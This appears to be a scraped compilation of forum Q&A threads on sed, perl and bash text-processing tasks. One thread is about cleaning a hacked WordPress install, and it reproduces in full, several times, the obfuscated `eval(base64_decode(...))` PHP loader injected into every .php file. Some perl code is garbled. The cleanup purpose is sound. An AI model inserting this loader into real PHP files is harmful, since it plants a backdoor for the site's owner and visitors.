bash script with simple regular expression - regex

Consider the following bash script with a simple regular expression:
for f in "$FILES"
do
echo $f
sed -i '/HTTP|RT/d' $f
done
This script shall read every file in the directory specified by FILES and remove the lines with occurrences of 'http' or 'RT' However, it seems that the OR part of the regular expression is not working. That is if I just have sed -i '/HTTP/d' $f then it will remove all lines containing HTTP but I cannot get it to remove both HTTP and RT
What must I change in my regular expression so that lines with HTTP or RT are removed?
Thanks in advance!

Two ways of doing it (at least):
Having sed understand your regex:
sed -E -i '/HTTP|RT/d' $f
Specifying each token separately:
sed -i '/HTTP/d;/RT/d' $f

Before you do anything, run with the opposite, and PRINT what you plan to DELETE:
sed -n -e '/HTTP/p' -e '/RT/p' $f
Just to be sure you are deleting only what you want to delete before actually changing the files.
"It's not a question of whether you are paranoid or not, but whether you are paranoid ENOUGH."

Well, first of all, it will process all WORDS in the FILES variable.
If you want it to do all files in the FILES directory, then you need something like this:
for f in $( find $FILES -maxdepth 1 -type f )
do
echo $f
sed -i -e '/HTTP/d' -e '/RT/d' $f
done
You just need two "-e" options to sed.

Related

replace string with underscore and dots using sed or awk

I have a bunch of files with filenames composed of underscore and dots, here is one example:
META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params
I want to remove the part that contains .bed.nodup.sortedbed.roadmap.sort.fgwas.gz. so the expected filename output would be META_ALL_whrAdjBMI_GLOBAL_August2016.r0-ADRL.GLND.FET-EnhA.out.params
I am using these sed commands but neither one works:
stringZ=META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params
echo $stringZ | sed -e 's/\([[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.\)//g'
echo $stringZ | sed -e 's/\[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.[[:lower:]]\.//g'
Any solution is sed or awk would help a lot
Don't use external utilities and regexes for such a simple task! Use parameter expansions instead.
stringZ=META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params
echo "${stringZ/.bed.nodup.sortedbed.roadmap.sort.fgwas.gz}"
To perform the renaming of all the files containing .bed.nodup.sortedbed.roadmap.sort.fgwas.gz, use this:
shopt -s nullglob
substring=.bed.nodup.sortedbed.roadmap.sort.fgwas.gz
for file in *"$substring"*; do
echo mv -- "$file" "${file/"$substring"}"
done
Note. I left echo in front of mv so that nothing is going to be renamed; the commands will only be displayed on your terminal. Remove echo if you're satisfied with what you see.
Your regex doesn't really feel too much more general than the fixed pattern would be, but if you want to make it work, you need to allow for more than one lower case character between each dot. Right now you're looking for exactly one, but you can fix it with \+ after each [[:lower:]] like
printf '%s' "$stringZ" | sed -e 's/\([[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.[[:lower:]]\+\.\)//g'
which with
stringZ="META_ALL_whrAdjBMI_GLOBAL_August2016.bed.nodup.sortedbed.roadmap.sort.fgwas.gz.r0-ADRL.GLND.FET-EnhA.out.params"
give me the output
META_ALL_whrAdjBMI_GLOBAL_August2016.r0-ADRL.GLND.FET-EnhA.out.params
Try this:
#!/bin/bash
for line in $(ls -1 META*);
do
f2=$(echo $line | sed 's/.bed.nodup.sortedbed.roadmap.sort.fgwas.gz//')
mv $line $f2
done

deleting and replacing string inside .php file

I am having some problems with loading a php file and then replacing his content with something else.
my code looks like this
$pattern="*random text*"
$rep=" "
$where=`ls *.php`
find -f $where -name "*.php" -exec sed -i 's/$pattern/$rep/g' {} \;
This wont load entire line of text. Also is there a limit of how many character can $pattern load?
Also is there a way to make this .sh file execute on every 15min for example?
i am using mac osX.
Thanks!
The syntax $var="value" is wrong. You need to say var="value".
If you just want to do something on files matching *.php, you are doing it in just a directory, so there is no need to use find. Just use for loop:
pattern="*random text*"
rep=" "
for file in *.php
do
sed -i "s/$pattern/$rep/g" "$file"
done
See the usage of sed "s/$var/.../g" instead of sed 's/$var/.../g'. The double quotes expand the variables within the expression; otherwise, you would be looking for a literal $var.
Note that sed -i alone does not work in OS X, so you probably have to say sed -i ''.
Example of replacement:
Given a file:
$ cat a
hello
<?php eval(1234567890) regular php code ?>
bye
Let's remove everything from within eval():
$ sed -r 's/(eval\()[^)]*/\1X/' a
hello
<?php eval(X) regular php code ?>
bye

Pass sed output to mv

I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)`
Where I wrote $sed would be the output of sed.
hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" `sed -n 's/<title>\([^<]*\)<\/title>/\1/p;' $file| sed -e 's/[ ][ ]*/_/g'`.txt
done
So, if you have files 1.txt, 2.txt and 3.txt, each with cat, dog and my hippo in their TITLE tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted initial $file in case there are spaces in filenames; and added a second sed to convert any spaces in the <title> tag to _'s in resulting filenames. NOTE the whitespace inside the []'s in the second sed command is a literal space and tab character.
You can enclose expression in grave accent characters (`) to make it insert its output to the place you want. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
It is rather not flexible, but should work.
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution search for pattern in each one of your .txt files. For each file it creates string mv 'file_name' 'found_pattern'.
With the e command at the end of sed commands, this resulting string is directly executed in terminal, thus it renames your files.
Some hints:
Note the use of =s instead of /s as delimiters for sed substition: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). And in this way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I'm speaking of this one below:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
^
)
So use it with caution! I would recommand to first use the line without final e: it won't execute any mv command, but just print instead what would be executed if you were to add the e.
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls '*.txt' | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always replace the xargs substitues by -i\{\} because the resulting command is compatible if I use it sometimes with find and its substitute {}.
Next the -maxdepth option will help find not to dive deeper in directory, if no subdir, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if opening and closing tag is on same textline) would be by grep
A more solid solution is to use a HTML Parser and navigate by DOM operation
The simple solution base on:
get the title line
remove the everything before and after title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.

Regexp for extensions tgz, tar.gz, TGZ and TAR.GZ

Im trying to get a regexp (in bash) to identify files with only the following extensions :
tgz, tar.gz, TGZ and TAR.GZ.
I tried several ones but cant get it to work.
Im using this regexp to select only files files with those extensions to do some work with them :
if [ -f $myregexp ]; then
.....
fi
thanks.
Try this:
#!/bin/bash
# no case match
shopt -s nocasematch
matchRegex='.*\.(tgz$)|(tar\.gz$)'
for f in *
do
# display filtered files
[[ -f "$f" ]] && [[ "$f" =~ "$matchRegex" ]] && echo "$f";
done
I have found an elegant way of doing this:
shopt -s nocasematch
for file in *;
do
[[ "$file" =~ .*\.(tar.gz|tgz)$ ]] && echo $file
done
This may be good for you since you seems to want to use the if and a bash regex. The =~ operator allow to check if the pattern is matching a given expression. Also shopt -s nocasematch has to be set to perfom a case insensitive match.
Use this pattern
.*\.{1}(tgz|tar\.gz)
But how to make a regular expression case-insensitive? It depends on the language you use. In JavaScript they use /pattern/i, in which, i denotes that the search should be case-insensitive. In C# they use RegexOptions enumeration.
Depends on where you want to use this regex. If with GREP, then use egrep with -i parameter, which stands for "ignore case"
egrep -i "(\.tgz)|(\.tar\.gz)$"
Write 4 regexes, and check whether the file name matches any of them. Or write 2 case-insensitive regexes.
This way the code will be much more readable (and easier) than writing 1 regex.
You can even do it without a regex (a bit wordy though):
for f in *.[Tt][Gg][Zz] *.[Tt][Aa][Rr].[Gg][Zz]; do
echo $f
done
In bash? Use curly brackets, *.{tar.gz,tgz,TAR.GZ,TGZ} or even *.{t{ar.,}gz,T{AR.,}GZ}. Thus, ls -l *.{t{ar.,}gz,T{AR.,}GZ} on the command-line will do a detailed listing of all files with the matching extensions.

Command line find a large string and replace on all files in a subdirectory

I've got a hacked wordpress install I'd like to clean up. Every single .php file has had this inserted at the top:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
I'd like to replace that string with nothing in every .php file in the wordpress directory including subs. What's my best option? I've got bash, python, perl, php and so on.
I've tried:
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
and
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;
# get a list of files
local #ARGV;
find sub {push #ARGV, $File::Find::name if /\.php$/}, '.';
# do in-place editing
$^I = '.bak';
while (<>) {
print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
Note that in your base string, you already have the reg-exp delimiter used by default (and you are using) the '/' char in your perl and sed.
You can either escape all those like '\/' OR you can use a different char for the reg-exp delimiter. For sed, try
sed -i 's#<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>##g' *.php
For some seds, you have to 'tell' sed you are changing up. only the initial reg-exp delimiter needs an esacpe char, i.e. sed -k 's\#<....##g' *.php
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.
The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter. Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
I modified the command a bit. It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).
I also use a find command to get the list of all .php files in and below the current directory. If working in a flat directory, your *.php is sufficient.
You also need to escape regex specials in the string you want to match. Example the '*', '?', and '()' characters need to be escaped.
If the command works as expected, you can run the following command to remove the .bak files:
/bin/rm `find . -name '*.bak'`
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
Feel free to substitute the ginormous base64 string instead of \S+
Try this:
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
Things I changed:
escaped all regexp symbols in your code (e.g. (, ), * and ?)
replaced ' with '\'' in your code, which is the only way to put a ' in a '-delimited string in bash
If you want to recursively replace *.php even in subdirectories of this directory:
find -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
Note that I've used -print0 and -0 so it doesn't break with files with spaces.
Here's a bash 4+ script
#!/bin/bash
shopt -s globstar
shopt -s nullglob
for php in **/*.php
do
data=$(<"$php")
a=${data%%<?php*}
echo "$a ${data#*?>}" > t && mv t "$php"
done